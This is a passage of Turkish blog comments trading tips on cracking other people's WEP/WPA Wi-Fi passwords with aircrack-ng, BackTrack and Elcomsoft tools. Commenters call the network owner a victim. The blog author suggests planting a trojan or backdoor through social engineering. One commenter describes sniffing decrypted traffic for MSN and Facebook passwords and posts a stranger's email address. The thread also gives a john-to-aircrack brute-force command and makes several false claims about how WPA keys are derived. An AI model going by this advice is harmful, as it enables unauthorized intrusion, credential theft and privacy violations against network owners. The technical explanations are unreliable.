        hocam paketten kastım handsake.. handsake’ye de gerek yok.. buda benim hediyem olsun.. aircrackın win versiyonunu indirin.. şifreyi bir kere yanlış girin.. wzcook ile launca tıklayın.. size yerel disk c nin içine wepkey diye bi txt atar.. içinde ağ adı ve masster key yazare.. sonra alın onu elcomsoft ta bssıd yerine ağ adını, hash yerine de master keyi yazın ve vordlist ile taratın şifreyi kırın.. ben böyle yapıyorum..
        şimdi şunu özellikle söyleyeyim.. wpa lar aes şifreleme tekniğiyle şifrelenir.. biz md5 leri kırarken şifrenin md5 i ile wordlisttteki şifrelerin md5 ini karşılaştırıp kırıyoruz ama burada durum farklı.. bulunan master key; ağ adı TC Emniyet ve şifre: hosgeldin iken 88fa.. gibi bişeydir.. ağ adı veya şifrenin bir karakteri bile değişirse master key değişir.. yani md5 gibi direkt olarak şifreyi md5 leyip veri tabanında saklamıyor.. ağ adını aes ile şifreliyor.. ardından şifreyi de aes ile şifreliyor.. elinde iki tane 64 haneli kod oluşunca da bunları tekrardan aes ile şifreleyip master keyi oluşturuyor.. yani kısacası sadece wzcook ve elcomsoft ile kırmak çok daha kolay.. backtrack biraz zoır herkes yapamıyor ama size tavsiyem backtracki hemen kaldırmayın çünkü çok süper mutasyonlarla wordlist hazırlama özelliği var.. :))
        umarım bu yazdıklarımı okuyanlar bi teşekkür ederler.. sizi büyük bi beladan kurtardım.. :))

        • #290 ergün tarafından, tarihinde

          bi düzenleme yapmam gerek.. c deki wepkey.txt nin içinde wep şifrelerini verir..oradaki ilk 16 haneyi yazarsanız bağlanırsınız sanırım olmadı 24 haneyi yazın ama kimsenin ki wep olmadığı için wpa lar şart.. orada wpa ların hash lerini değil de sizin bağlanmak için girdiğiniz şifrenin hash değeini veriyor sanırım.. ama kablolu+kablosuzlar için kurbanın yanına gidip “kardeş bi e mailime bakıp çıkacam” derseniz adam şifreyi vermek istemez o yüzden kabloyu sizin laptopa iki dk lağına takabilir.. 🙂 orada şifreye gerek yok naılsa… sonra eve gidince wzcook ile bi bakın bakalım eğer bi hash verirse onu kırmaya çalışın.. ama dikkat edin kablo takmadan önce ağ bağlantılarından kablosuz ağları yönete gelin ve o ağı kaldırın.. hiç şifre denenmemiş şekilde kabloyu takın.. isterseniz en başta wzcook u çalıştırtın sonra wepkeyin içine bi bakın kırmak istediğiniz ağ ile ilgili bi hash yoksa gidip kabloyu takabilirsiniz.. ama kablonun internet kablosu değilde ethernet kablosu olmasına dikkat edin.. internte kablosu ağ akışı sağlar dolayısıyla şifre pc nize kaydedilmez ama ethernet kablosu hem ağ akışı hemde veri akışı sağlari yoksa modemin ayarları modemin bağlı olduğu pc ye aktarılamaz.. ethernet kablosu dediğim şey ise modemden çıkan kablodur.. eğer olmasa tek çare bt5..

  174. #291 Ahmet tarafından, tarihinde

    arkadaşlar bu iş öyle zevkli bir iştir ki anlatmak imkansızdır ama şunu belirtmek istiyorum adamın internetini sömürmek için şifre kırmıyoruz sadece bir şeyi başarmak için şifre kırıyoruz inanın buna bir şifreyi kırdığınızda ben 26 haneli bir web şifresini kırdığımda öyle mutlu oldum ki bunu anlatmak için kelime yok yok ve buna inanıyorum hiç bir şifre kırılmayacak değildi her şifre kırılabilir imkansız diye bir şifre yoktur tüm kaplosuz ağların şifresi en fazla kaç haneli 1000 mi neyse bunu kırmak imkansız değildir teknik gerekiyor ” bir kere imkansızı yapabileceğimizi gördüğümüzde ” olasılıklar artık bir hiçtir ( sherlock holmes :))

    • #292 ergün tarafından, tarihinde

      64 haneli bir wpa nın kırılması olasılığı milyonda bir ise, siz o milyonda birlik ihtimalle bile kırdıysanız 100 de 100 lük sonuç almış olursunuz.. bir işin iki sonucu vardır: başarılı yada başarısız.. başarılıysanız işi başarma olasılığı 100 de 100 dür.. başarısızsanız işi başarma olasılığı 100 de 0 dır.. dolayısıyla olasılıklar sadece tahmindir.. milyonda birlik ihtimalde siz o “milyonda bir” iseniz sizin için kırılması olasılığı 100 de 100 dür.. değilseniz 100 de 0…

  175. #293 selefi tarafından, tarihinde

    murat hocam,
    wireless konusunda seni uzman görüyorum ve onun için soruyorum.
    1-Acaba yakalanan handshake dosyasından yararlanarak wireless şifresinin kaç haneli olduğu anlaşılır mı? Bir forumda gencin biri Ewsa proğramını kullanarak Mask Attack yapması sonucu şifrenin 8 haneli olduğunu anladığından bahsediyordu, bu mümkünmü…
    2-Handshake dosyasının detaylıca editlenmesini sağlayacak wiresharke haricinde bir proğram ya da metod varmı ?
    3-md5 lerin cracklanması gibi handshake içerisinde yer alan keyin cracklanması sizce mümkünmü?

    • #294 Murat Çeşmecioğlu tarafından, tarihinde

      1) Böyle birşey hiç duymadım. Gerçi EWSA’yı çok kurcalamadım. Bu yüzden birşey diyemiyorum. Forum linkini verebilirseniz incelemek isterim.
      2) Wireshark ile handshake dosyalarını yakalaybilirsiniz fakat düzenleme konusunu bilmiyorum. Düzenlemenin nasıl bir faydası olacak ki?
      3) Zaten şu an kullandığımız WPA kırma yöntemi MD5’e benzer bir yöntem. MD5’i de brute force yöntemi ile kırıyorlar. MD5 kırma sitelerinde önceden veritabanıne girilen hashler ile sizin yazdığınızı karşılaştırıyor.

    • #295 ergün tarafından, tarihinde

      1. sorunun cevabı benimde işime yarar bende zaten daha önce murat beye böyle bi soru yöneltmiştim. ama siz o linki verirseniz bende bi araştırırım kendi paketimde de denerim bi sonuç alırsam buraya yazarım..
      md5 leri kırarken elimizde şifrenin md5 i ( yani hash değeri) oluyor ve vordlistteki şifrelerin sırayla md5 ini bulup elimizdeki md5 ile karşılaştırıyor ve sonucu veriyor ama burada bizim elimizde wpa şifresinin master key (hash) değeri olması lazım ki onuda wordlistteki şifrelerin hash değeri ile karşılaştırabilsin..
      murat beyin dediğine göre paket yakalamadan ve hatta paketi kırmadan master key i elde edemeyiz.. ben bunuda daha önce sormuştum o yüzden yani. 🙂

  176. #296 ahmet tarafından, tarihinde

    abi ben bi modeme baglandım kullanıyorum ama adam sifreyi degistirirse ben o sifreyi nasıl alacam yada otamatik bana gelmesini nasıl yaparım degisse bile baglantı yapabilirmiyim tşk

    • #297 Murat Çeşmecioğlu tarafından, tarihinde

      Eğer ağa bağlandıktan sonra ağın sahibinin bilgisayarına trojan yerleştirebilirseniz tekrar bağlanıp şifreyi alabilirsiniz. Ama çok uç bir örnek verdim.

      • #298 ergün tarafından, tarihinde

        :))) süper cevap.. trojanı atabilen adam zaten wpa kırmakla uğraşmaz.. online-ofline loglardan şifreyi alabilir.. ama eğer adam şifreyi otomatik yapmışsa ki büyük ihtimal öyledir, o zamanda dosya aktarımını seçerseniz c\kablosuz ağ güvenlik şifresi.txt yi çekip alırsın.. olmadı Pisi yönete girip modem kurulum programının içine bakar şifreyi alırsın.. çok uçuk bi örneğe çok daha uçuk açıklama getirdim :))

        • #299 Murat Çeşmecioğlu tarafından, tarihinde

          Aslında verdiğim cevap çok uçuk değildi. Tam tersine güzel bir şifre kırma yöntemidir 🙂 Trojan vs. ile uğraşmaya gerek yok. İstenirse yüklenebilir tabi.

          Şu an yaptığım birşey var bu konuda aslında. Tamamen bitince çok güzel bir video çekip paylaşmayı düşünüyorum 🙂

          • #300 ergün tarafından, tarihinde

            sanırım heyecanlandım.. trojan vs değil diyorsunuz acaba ağ üzerinden bi işlem mi? ms dos gib mesela.. yada kimsenin beceremediği telnet ile mi ? paylaşım olmadan dosyalara ulaşılabilir mi?? team wiever gibi bi sistem olsa ama şifre gerektirmeyen bi sistem, çok süper olur.. ( takipteyim :)) )

          • #301 Murat Çeşmecioğlu tarafından, tarihinde

            Sonuçta elbette bir şekilde karşı bilgisayarda kendimize bir kapı açmamız gerekiyor. Ama bunun illa bir trojan olmasına gerek yok. Hem yakalanmayan trojan bulmak zor. Kendimize kapı açacak trojan benzeri birşey yaptıktan sonra komut sistemine geçebiliyorum. Aynı şekilde uzaktan yönetim de çalıştırılabilir.

            Tek sorun bize kapıyı açacak olan programı karşı tarafa yedirmek.

  177. #302 ergün tarafından, tarihinde

    Murat Çeşmecioğlu :Sonuçta elbette bir şekilde karşı bilgisayarda kendimize bir kapı açmamız gerekiyor. Ama bunun illa bir trojan olmasına gerek yok. Hem yakalanmayan trojan bulmak zor. Kendimize kapı açacak trojan benzeri birşey yaptıktan sonra komut sistemine geçebiliyorum. Aynı şekilde uzaktan yönetim de çalıştırılabilir.
    Tek sorun bize kapıyı açacak olan programı karşı tarafa yedirmek.

    karşı tarafa program göndermekten kastınız dosya göndermek mi? programı aktarmak zor olur.. artı gönderilen dosyanın kapı açması için zaten yapılacak işlemlerin hepsinin toplamına trojan deniyor..yani trojanın client kısmı kapıyı açacak.. server işlem yapacak.. client antilere yakalanır.. .dat ile yazılırsa takılamayabilir ama .dat olarak komut yazmak da biraz uğraştırır adamı.. msdos dan bağlantı komutlarını bulmuştum bi yerde adam video çekip bağlandı ve dosyalarını çekti ama görüntü almak daha iyi en azından dosyanın dizinine gidip çekmek için yazmaktan kurtarır bizi.. artı trojan göndermeden veya karşı tarafın dosyalarını paylaşıma açmadan herhangi bi işlem yapamayız ki.. port açma sorunu da var.. evimizde yapabiliriz ama int. cafede port açmak biraz zor.. sanırım cafeplus programı 192.168.x.x adresine erişimi engelliyor yada kurulum şifresini girmemize rağmen modem arayüzüne ulaşamıyoruz.. en azından ben cafede port açamadım.. bu konuda bi bilginiz varsa çok çok çok iyi olur paylaşırsanız.. şimdiden teşekkrler çalışmalarınızda da başarılar..

    • #303 Murat Çeşmecioğlu tarafından, tarihinde

      Bence trojan daha çok içinde bilgisayarı kontrol etmeye yönelik fonksiyonlar bulunduran programlara deniyor. Bana sadece giriş izni yaratan programcıklara backdoor ismini yakıştırıyorum 🙂 Bu yüzden trojan demek benim kullandığım şeye biraz fazla kaçar.

      Ama aynı şekilde antivirüslere yakalanmayan bir trojan da yüklenebilir. İşin içinde sosyal mühendislik yatıyor biraz. Bu yüzden tüm bu işlemlerin sonunda kullanıcıyı kandıramama ihtimalimiz de var.

      • #304 ergün tarafından, tarihinde

        elbette ama kurban ıp adresi ile yapılabilir..
        en sık ziyaret ettiği yerlere yönlendirilmiş site linkleri koyar o şekilde bile bulaştırabilirsin ama sadece açık kapı işimizi görürmü ki.. ms dos tan bağlanma komutları, dosya akışı (ki bu msdos yoluyla olacaksa çok uzun sürer), sadece belli bi porttan saldırı.. sabit ip sorunu.. bence backdoor (isim güzelmiş 🙂 ) elimizdeki imkanları kısıtlar.. karşı pc de yönetici olamayınca program çalıştırma işlemi, admin hesabı açma işlemi ve en önemlliside pc kapalı iken bağlanamama sorunu ortaya çıkar.. bi trojan atıp ( tabii bu trojan baba trojan olacak) pc kapalı iken de işlem yapılabilir.. sadece pc nin fişi elektrik prizine ve ethernet kablosu da kasaya taklılı olması yeterli.. acaba backdoor ile yetinerek bunları yapabilirmiyiz..

  178. #305 polat tarafından, tarihinde

    murat bey bende boot ini klasörü çıkmıyor

    • #306 Murat Çeşmecioğlu tarafından, tarihinde

      Klasör seçeneklerinden “sistem dosyalarını gizle” seçeneğinin işaretini kaldırırsanız gözükecektir.

  179. #307 mustafa tarafından, tarihinde

    hocam ben wpa şifrelemeli bir tane ağdan hanshake yakaladım.yakaladığım hanshakeyi backtracta kontrol ettim.wpa handshake 1 yazıyor.elimdeki wordlistlerle backtrackta kırmayı denedim ama şu na kadar başarılı olamadım.daha önceden başka yorumlarda söylediğiniz elcomsoft wireeles security programını pc ye sorunsuz kurdum.backtrackta wpa 1 olan cap dosyasını bu programda açmayı denediğimde no hanshakes şeklinde bir hata veriyor.bunu nasıl düzeltebilirim.şimdiden teşekkürler hocam.

  180. #308 ergün tarafından, tarihinde

    murat bey yeni olayla karşılaştım.. direk konuya dalıyorum colasoft programını kullanıyormusunuz.. arşivdeki cd lerin içinde buldum.. eskiden wpa kırmak için yüklediğim programlardan biri olsa gerek. paket açmak için geliştirilmiş süper bi program.. daha önce bi ark demişti ki bende bi program var ağları görüntülüyorsun anında şifresini gösteriyor..bende yemedim tabi bi saldırı gerçekleştirlmelidir demiştim.. ama şimdi inanır gibi oldum.. mesela aircrack ın win versiyonunu indirmiştim orada test klasörü ve içinde de birer paket ve wordlist vardı. bende aldım o paketi colasoft ile açtım ve içerisinde (artık kimin ağını dinlemeye almışlarsa) bssid ve ağdan düşürdüğü diğer aygıtların mac adreslerini gördüm.. şu bt5 teki station lar varya airplay deauth falan filan işte onları gördüm.. sonra biraz daha kurçaladım paketi 12.04.2006 gibi bi tarihte toplamışlar sanırım öyle bi tarihti gördüğüm.. ve bunu wpaiçin değilde msn kırmaya çalışırken de yüklemiş olabilirim çünkü program bir keylogger gibi online logları da alıyor.. ftp logları ıcq logları filan.. yani uzun lafın kısası bu program çok işe yarar gibi göründü siz muhakkak kullanmışsınızdır ama eğer kullanmadıysanız da bi gözatmanızı tavsiye ve rica edecem.. paketi onunla açıp loglardan veya packet sekmesinden ayrıntıları filan tıklayıp şifreyi alamazmıyız.. bu arada program paket toplama işini de yapıyor.. artııı kablolu bağlantılarınızla da netin sahibinin msn şifresini alaabilirsiniz.. :))tabi sizinkini de alabillirler.. murat bey bu konuyla özel olarak ilgilenmenizi rica edecem.. şimdiden teşekkürler..

    • #309 ergün tarafından, tarihinde

      bu arada şu linkten programı indirirsiniz ve ftp ıcq gibi test amaçlı paketleride indirebilirsiniz.. işe yarayacak gibi.. link aşağıda..

      http://www.colasoft.com/capsa/

      • #310 Murat Çeşmecioğlu tarafından, tarihinde

        Teşekkür ederim. Programa bakacağım müsait bir zamanımda.

        • #311 ergün tarafından, tarihinde

          rica ederim.. 8 gözle bekliyorum.. :))
          ama (affınıza sığınarak söylüyorum) sitenizin güncelleme işini biraaz aksatıyor gibisiniz.. 🙂 günde ortalama 2 yorum yapılıyor.. panele girip okuyup kontrol edip onaylamanız sanırım 15 dk geçmez.. 4 gündür bu yorumu ve cevabınızı bekliyorum.. 🙂 umarım cevabınız o kadar bekletmez.. 🙂

          • #312 Murat Çeşmecioğlu tarafından, tarihinde

            Sizin daha önceden onaylı bir yorumunuz vardı. Her seferinde aynı isim ve mail adresi ile yorum yaparsanız onay için beklemenize gerek kalmaz. Önceki yorumlarınızda farklı mail adresi yazmışsınız.

  181. #313 kaan tarafından, tarihinde

    murat abi yada arkadaşlar biri wpa2 kırmayı ayrıntılı bi şekilde anlatabilir mi? her basamakta ne yapıyoruz hangi kod ne işe yarar. resimli yada videolu şeklinde nerde ne yapmamız gerektigini sıfırdan anlatırmısınız yada nereden ögrenebilirim?acil cevap?

  182. #315 ergün tarafından, tarihinde

    Murat Çeşmecioğlu :
    Sizin daha önceden onaylı bir yorumunuz vardı. Her seferinde aynı isim ve mail adresi ile yorum yaparsanız onay için beklemenize gerek kalmaz. Önceki yorumlarınızda farklı mail adresi yazmışsınız.

    sabit olaqn hangisiydi bilmiyorum ama azkds@h… adresini sabitlerseniz bundan sonra aynısıyla giriş yaparm.. bu mesajı yayınlamanıza ggerek yok.. teşekkürler..

  183. #316 Acemi85 tarafından, tarihinde

    Kardeşim öncelikle ellerien sağlık anlattığın yöntemlerle WEP şifrelerini kırabildim. Hatta bulduğum bir dökümanla wordlist kullanarak WPA2 bile kırdım senin sayende. Yalnız sana şöyle bir sorum olucak.
    Brute force ile WPA2 kırmak için ne yapmam lazım?
    http://www.corelan.be/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/
    Şu adreste bulduğum bir dokumanda yazmam gereken komutta root@bt:~# /pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w – /tmp/wpa2*.cap

    yazmam gerektiğini söylüyor. Herhalde benim backtrack ta jhon the ripper yok. Bunu nasil entegre edip calistirabilirim detaylı anlatirsan sevinirim. Tekrar emegine saglik.

  184. #318 ERDAL tarafından, tarihinde

    murat bey yüreğinize sağlık. konfigirasyonunu tekrar yapmam çok uzun zaman alacak, şifresini unuttuğum bir draytec modemim var. bu modemin şifresinide anladığım kadarıyla sizin yazdığınız gibi kırabilirim. fakat bunun windowsun üzerinden bu kadar kurulum yapmadan bir yöntemi yokmu. birde kullandığım makinanın ethernet kartı broadcom ama ethernet kartı ile değil wiraless ile ağ bağlantımı sağlıyorum sizce üstte anlattığınız işlemleri gerçekleştirebilirmiyim. wiraless atheros bu arada.

    • #319 Murat Çeşmecioğlu tarafından, tarihinde

      Eğer windows’un yanında dual boot şeklinde çalıştırırsanız uzun uzun kuruluma gerek kalmaz. Ethernet kartının broadcom olmasında bir sorun yok. Wireless kartı tanıması önemli. Umarım kırabilirsiniz. Modemi fabrika ayarlarına döndürmeyi deneyebilirsiniz.

  185. #320 ergün tarafından, tarihinde

    Elcomsoft Wireless Security Auditor ile wpa kırmada sorun yaşayanlar için bir video hazırladım.. bt ile toplanan paketleri açabilirsiniz ve hatta wordlistte olmasa bile şifreleri kırabilirsiniz.. videoyu izleyince ne demek istediğimi anlarsınız.. ayrıntılı olarak başka bi sitede paylaşmıştım ama sitenin ismini burada verirsem murat beye ayıp olur.. o yüzden sadece videonun linki vereceğim.. forumlarda ararsanız bulunursunuz..

    http://www.youtube.com/watch?v=tn7r4VYQLGo&context=C37fbfa5ADOEgsToPDskKsx1zmEs2vohaTeMJkKRdr

    • #321 Murat Çeşmecioğlu tarafından, tarihinde

      Çok güzel bir video olmuş, elinize sağlık.

      Diğer site wifi-türk sanırım 🙂 Site ismini vermek bir sorun olmaz. Sonuçta ordaki arkadaşların ilgi alanları kablosuz ağlar üzerine. Benim ise sadece öğrendiklerimi paylaştığım bir blog 🙂

  186. #322 ergün tarafından, tarihinde

    Murat Çeşmecioğlu :
    Çok güzel bir video olmuş, elinize sağlık.
    Diğer site wifi-türk sanırım 🙂 Site ismini vermek bir sorun olmaz. Sonuçta ordaki arkadaşların ilgi alanları kablosuz ağlar üzerine. Benim ise sadece öğrendiklerimi paylaştığım bir blog 🙂

    teşekkür ederim.. ben yine de site ismi vermeyeyim :)) Bilgi paylaştıkça çoğalır.. sizden öğrendiklerimizi bilmeyenlere aktarıyoruz.. Ahh bir de nıvıda teslam olaydı.. 103 bin değil 150 küsür milyon şifre denenirdi.. benim pc malesef 4000 i görmedi.. 🙁

  187. #323 IIMicoII tarafından, tarihinde

    iyi günler murat bey ben yeni bi wireless adaptör alacağım fakat wireless den pek anlamadğım için ne tür bişey alabileceğime karar veremiyorum bana şöyle backtrack uyumlu en kötü 1 km menzilli ısınma problemi olmayan bir wireless adaptör önerirmisiniz?

    • #324 Murat Çeşmecioğlu tarafından, tarihinde

      Harici adaptörler hakkında çok detaylı bilgim yok. Bu tip antenler ve cihazlarla ilgilenen forumları araştırırsanız daha sağlıklı bir bilgiye ulaşabilirsiniz.

  188. #325 kaan tarafından, tarihinde

    selam abi. abi elinde saglam bi wordlist varmı yada indirebilicegimiz bi adres biliyormusunuz? birde abi bu aırcarack çok yavaş abi bunun hızlı yapmanın bi yolu var mı?

    • #326 Murat Çeşmecioğlu tarafından, tarihinde

      Bildiğim bir wordlist yok. Daha hızlı olması için ekran kartını da kullanabileceğiniz Elcomsoft’un Wireless Security Auditor progrmaını tavsiye ederim.

  189. #327 Baki tarafından, tarihinde

    Murat bey paylaşımlarınızı bir süredir takip ediyorum.. Backtrack konusunda az buçuk bilgim varsa onların da çoğunu burdan edinmişimdir.. Ben de beini ile handshake yakalamaya çalışıyorum. Wep şifreleri büyük ölçüde hallediyor fakat iş wpa ya gelince yakaladığım handshakeleri bir türlü sabit sürücüye veya usb ye kaydedemedim.. Handshakeleri kaydedip EWSA ile elimdeki wordlistleri denetmeyi düşünüyorum.. Sizin de beini ile çalıştığınızı okudum acaba bu konuda bir çözümünüz var mıdır? mount olayını denedim ama kopyalama yapamıyorum bir türlü.. saygılar..

    • #328 Baki tarafından, tarihinde

      Bu sorunumu kendim halletim sizi yormayım 🙂 Ama bu sefer başka bi olaya takıldım.. Kendi ağım Wpa2 ile şifrelenmiş bir ağ.. Onun üzerinden yakaladığım cap dosyasını Ewsa ile açtım şifreyi bildiğim için kullandığım sözlük dosyasına şifreyi yazıp attack yaptım ve şifreyi aldım.. Fakat başka bir ağdan yakaladığım handshake i açmaya çalışınca bu dosya içerisinde handshake bulunamadı gibi bir hata alıyorum. Fakat airplay-ng ile ağı 3 saat kadar dinledikten sonra bir kullanıcı bağlandı ve nihayet bir handshake aldım diye sevinerek usb ye kaydettim kısacası kendi ağım için uyguladığım tüm adımları uyguladım ama gel gelelim programa bunu açtıramadım.. Sizce backtrack ile deneme yapmalı mıyım yoksa kaydettiğim cap dosyası gerçekten bozuk mu?

      • #329 Baki tarafından, tarihinde

        2. sorunumu da çözdüm 🙂 ama bu sefer daha farklı bi problem var.. Şimdi mesele şu.. Masaüstü bilgisayarım çift çekirdek p4 3.06 ghz işlemcili.. Ewsa yı masa üstü pc de kullanırken sorun yoktu.. bugün bi de laptop da denemek istedim.. Sözlük attack başladıktan 15 dakika sonra cpu sıcaklığı 75 derecelere geldi.. laptop da i3 2.53 ghz 4 çekirdek işlemci var ekran kartı da nvidia 520m 1gb .. acaba program sadece tek bir cpu kullandığı için mi bu kadar ısındı yoksa işlemci hızı mı düşük geliyor .. Program zaten cpuyu %100 kullanıyor görünüyor.. Başka program çalıştırmadığım halde durum bu.. Programı windows 7 ile açıyorum masaüstü pc de xp kullanıyodum.. Bilgisayarların ikisinde de bu zamana kadar hiç ısınma sorunu olmamıştı.. Ben biyerde hata mı yapıyorum yoksa bu kadar ısınması normal mi bilemedim.. Eğer konu hakkında bilginiz varsa ve yardımcı olursanız çok memnun olurum..

        • #330 Murat Çeşmecioğlu tarafından, tarihinde

          Öncelikle bir yanlış anlaşılmayı silmek adına şunu söyleyeyim: i3 işlemcilerin 4 çekirdekli olanları çok. i3 işlemciler çift çekirdeklidir. Fakat sanallaştırma ile bu çekirdekleri 4 gibi kullanırlar.
          Tahminimce sizin işlemciniz intel core i3-380M. Bu laptoplar için kullanılan (bkz: sondeki M harfi) bir işlemci olduğu için yük altına girdiğinde ısınması normaldir.

  190. #331 mesut bahtiyar tarafından, tarihinde

    merhabalar benim bir sorum olacak..elimde bir wordlist var tamam ama biz bu kod ta “aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt” wordlistin adresini nasıl yazacağız yada şoyle sorayım her hangi bir yerdeki bu wordlistin adresini nasıl koda aktaracağız? teşekkürler

  191. #333 Yusuf tarafından, tarihinde

    Ben Şuan Usb ye Ayarladım Giriyorum Açıyorum Bağlananda Var. Ama Bi Sıkıntım Var Bu İndirdiğim Worldlisti Linux sistemine nasıl aktaracağım. Dosyayı Nerden Görcem Bi YArdımcı Olurmusunuz Lütfen.

  192. #335 ergün tarafından, tarihinde

    Baki :
    2. sorunumu da çözdüm 🙂 ama bu sefer daha farklı bi problem var.. Şimdi mesele şu.. Masaüstü bilgisayarım çift çekirdek p4 3.06 ghz işlemcili.. Ewsa yı masa üstü pc de kullanırken sorun yoktu.. bugün bi de laptop da denemek istedim.. Sözlük attack başladıktan 15 dakika sonra cpu sıcaklığı 75 derecelere geldi.. laptop da i3 2.53 ghz 4 çekirdek işlemci var ekran kartı da nvidia 520m 1gb .. acaba program sadece tek bir cpu kullandığı için mi bu kadar ısındı yoksa işlemci hızı mı düşük geliyor .. Program zaten cpuyu %100 kullanıyor görünüyor.. Başka program çalıştırmadığım halde durum bu.. Programı windows 7 ile açıyorum masaüstü pc de xp kullanıyodum.. Bilgisayarların ikisinde de bu zamana kadar hiç ısınma sorunu olmamıştı.. Ben biyerde hata mı yapıyorum yoksa bu kadar ısınması normal mi bilemedim.. Eğer konu hakkında bilginiz varsa ve yardımcı olursanız çok memnun olurum..

    bence murat bey cevap vermek için kendini yormasın.. zaten birazdan tekrar sorununu çözdüğünü ve yeni bi sorunun olduğunu yazarsın.. :)) ewsa da cpu ayarının orada ne yazıyor bi ona bak istersen. varsayılana tıkla, kaç mantıksal işlemci varsa o kadar kullanır. laptoplarda ısınma sorunu var. ewet çünkü bende de oldu. başarılar..

    • #336 Baki tarafından, tarihinde

      Tam aksine o sorunun çözümünün olmadığına karar verdim ve daha yavaş olduğu halde masaüstü pc de çalışmaya devam edeceğim.. Ama wpa da artık sıkıcı bir hal aldı.. Deneme yanılma methoduyla şansını %50 nin üzerine çıkarman imkansız onu da taratıp şifreleri bulmak haftalarca hatta aylarca sürer.. Tabi terabaytlarca yer tutan 8-64 hane arası tüm harf,rakam,simge kombinasyonlarını içeren bir sözlük yaparsan ve ewsa gibi programları tam performansla çalıştırabilcek bir bilgisayarın varsa durum başka, herhalde büyük şirketlerin serverları gibi bilgisayarlarla mümkün olur o da 🙂 Zaten bu yolla şifre kırmak tam bir başarı da sayılmaz.. Eğer bir gün cap dosyasının içinde yazan geri dönüşümsüz psk yı çözebilen biri çıkarsa işte o zaman tam bir başarı olur, onun üzerine uğraşanlarda var ama codec çok derin bi mesele benim sıradan insanlara göre değil 🙂 Herhalde o zaman da bambaşka şifreleme yolları çıkmış olur.. Bu işin sonu yok.. Açık kaynak kodlarını başka amaçlar için kullanarak daha çok kendimi geliştirebilirim 🙂

      • #337 Murat Çeşmecioğlu tarafından, tarihinde

        Ne kadar büyük bir sözlük yaparsanız yapın WPA işi gerçekten zor. Hatta karakter sayısı arttıkça imkansıza doğru gidiyor. WPA’ları sözlükle kırmak yerine ya kafadan atın ya da bırakın o ağı 🙂
        Bilgisayarda 1-2 oyun olması bu gibi zamanlarda işe yarıyor.

  193. #338 haydar tarafından, tarihinde

    murat hocam merhaba,
    ben bt5i iso olarak win7x64 bitte kullanıyorum. Kendi ağımdan iki tane pc kullandığım için diğer pc açık tutunca handshake yi de yakalıyorum.Fakat wordlistle ilgili bi sorunum var: ağ şifrem 16 haneli, rakamlardan-büyük-küçük harflerden oluşuyor. Ağ şifremi bt 5 te masaüstüne boş bir text dosyasına kaydettim. Ama aircrack komutuna bu text dosyasını gösterince şifreyi bulmuyor.
    Acaba wordlist ille de crunch ile mi oluşturulacak? bt5 masaüstündeki bir metin dosyasının içine ağ şifremi yazdığım halde neden şifreyi kıramıyor?

    • #339 Murat Çeşmecioğlu tarafından, tarihinde

      wordlist’i -w parametresinde tam olarak belirtemiyor olabilirsiniz.

      • #340 haydar tarafından, tarihinde

        komutu net olarak dosyaismi ve uzantısıyla giriyorum. yani -w haydar.txt gibi.
        ama gene de olmuyor…

        • #341 Murat Çeşmecioğlu tarafından, tarihinde

          tamamda haydar.txt dosyası sizin çalıştığınız klasörde mi?

          Eğer -w haydar.txt yazıyorsanız komutu girdiğiniz klasörde bulunmalı.

      • #342 haydar tarafından, tarihinde

        bu arada elcomsoft un türkçe full versiyonunu nerden bulabilirim, bi bilginiz var mı?

      • #343 haydar tarafından, tarihinde

        Murat Çeşmecioğlu :
        tamamda haydar.txt dosyası sizin çalıştığınız klasörde mi?
        Eğer -w haydar.txt yazıyorsanız komutu girdiğiniz klasörde bulunmalı.

        Murat Çeşmecioğlu :
        tamamda haydar.txt dosyası sizin çalıştığınız klasörde mi?
        Eğer -w haydar.txt yazıyorsanız komutu girdiğiniz klasörde bulunmalı.

        haydar.txt belgesi masaüstünde. çalıştığım klasör neresi oluyor:). elcomsoft un da türkçe ve full versiyonu konusunda yardımcı olursanız, minettar kalırım.

  194. #344 ergün tarafından, tarihinde

    Murat Çeşmecioğlu :
    Ne kadar büyük bir sözlük yaparsanız yapın WPA işi gerçekten zor. Hatta karakter sayısı arttıkça imkansıza doğru gidiyor. WPA’ları sözlükle kırmak yerine ya kafadan atın ya da bırakın o ağı 🙂
    Bilgisayarda 1-2 oyun olması bu gibi zamanlarda işe yarıyor.

    ben yine de herşeye rağmen uğraşmaya değer diyorum. ewsa nın mutasyonları mantıklı kullanılınca işe yarıyor. geri dönüşümsüz yapan var diye biliyorum. ama paylaşmıyorlar. daha önce murat beye bir iki yol önermiştim olmaz demişti ama ben yinede bişeyler yapılacağına inanıyorum. paketleri airdecap komutu ile decyrpt ederek wireshark, colasoft tarzı programar ile çıkarılabilir diyorum. bi paketi decyrpt ettikten sonra açtım ve paket toplanırken hangi sitelere girdiğini falan gördüm, faceye girmişti, msn e girmişte, hatta vereyim isterseniz. nilada0206@hotmail.com diye bi msn adresi vardı, biyerde ise ssid:can yazıyordu, adamın şifresi 3 harfli ( can ) olamayacağına göre sanırım msn rumuzu can olması lazım. bu şekilde ayrıntıya ulaştığımıza göre şifreleri de ( msn, face, ıcq, wpa vs)bulabiliriz. sadece network kelimelerini bilmediğim için bulamadım. murat bey bi zahmet biraz uğraşsa bence işe yarar..

  195. #345 sifiryedi tarafından, tarihinde

    MAC filtrelemeyi eklemek güvenlik için iyi bir seçim olur.

  196. #346 ahmet tarafından, tarihinde

    Merhaba Murat abi bir sorum olacaktı elimde windowsta indirdiğim wordlistler var.Backtrack 4 ü her seferinde yeniden boot ederek açıyorum.Bu wordlistlere system>storage mediadan erişiyorum bu wordlistleri backtrack 4 ün masaüstüne atınca yer yok diyor haliyle bunları yolunu belirtsem wordlistlerin denenmesini sağlayabilir miyim yoksa illa masaüstünde mi olmak zorunda wordlistler

  197. #347 emre tarafından, tarihinde

    bi handsahke yakaladım commview ile,aircrackte kırmayı denedim.SSİD adı yok dio,buna ne çözüm

  198. #348 kaan tarafından, tarihinde

    selam benin iki sorum olsacak birincisi wpa ile wpa2 şifreleri en az ve en çok kaç karekterli şifre konulabilir. ikinciside abi bildigin bir woarlist yapma parogramı var mı?

    • #349 Murat Çeşmecioğlu tarafından, tarihinde

      Yanlış bilmiyorsam 64 karaktere kadar şifre koyulabiliyor. Ama wordlist yapmak için bir program bilmiyorum. Elcomsoft’u kullanabilirsiniz.

  199. #350 serhat tarafından, tarihinde

